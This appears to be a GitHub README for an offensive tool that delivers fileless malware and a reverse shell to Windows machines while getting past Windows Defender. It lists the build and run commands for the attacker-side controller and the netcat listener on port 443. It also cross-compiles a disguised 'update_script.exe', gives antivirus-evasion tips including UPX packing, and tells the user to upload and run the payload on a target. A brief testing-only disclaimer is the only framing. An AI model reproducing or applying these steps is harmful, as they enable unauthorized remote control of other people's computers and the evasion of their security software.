!!! FOR SECURITY TESTING PURPOSES ONLY !!!
******************************************************
DO NOT USE THIS ON SYSTEMS THAT YOU DO NOT
OWN UNLESS YOU HAVE EXPRESS PERMISSION !!!
Fileless malware that bypasses Windows Defender using PowerShell and obfuscation.
Just a simple Reverse Shell using a batch script to kick things off, after which everything is fileless.
YouTube video demonstration and explanation >>> https://youtu.be/LjoAV3O40og
Setup and Execution
- Clone this repo
git clone https://github.com/daniellowrie/update_script
- Build SecUp.go
go build SecUp.go
- Run SecUp
./SecUp 192.168.1.200
- Open another terminal, and start a Listener on port 443 (sudo if not root)
sudo nc -vnlp 443
- Open another terminal, and compile EXE
GOOS=windows go build update_script.go
- A word about comipiling for Windows...
- I've experienced Golang binaries getting flagged as malware, even "Hello, World!"
- I've read that removing
-ldflags
and-trimpath
may help and that the standard build is best for AV evasion - I've also read that packing can trip AV detection as well and again the standard build is best for AV evasion
- BUT if you'd like to make the binary smaller...
GOOS=windows go build -ldflags "-s -w" -trimpath update_script.go
upx -9 update_script.exe
- BUT if you'd like to make the binary smaller...
- I've read that removing
- I've experienced Golang binaries getting flagged as malware, even "Hello, World!"
- Back at the SecUp terminal
Press ENTER to continue...
- Upload and execute
update_script.exe
to target any way you like - Shellz! :)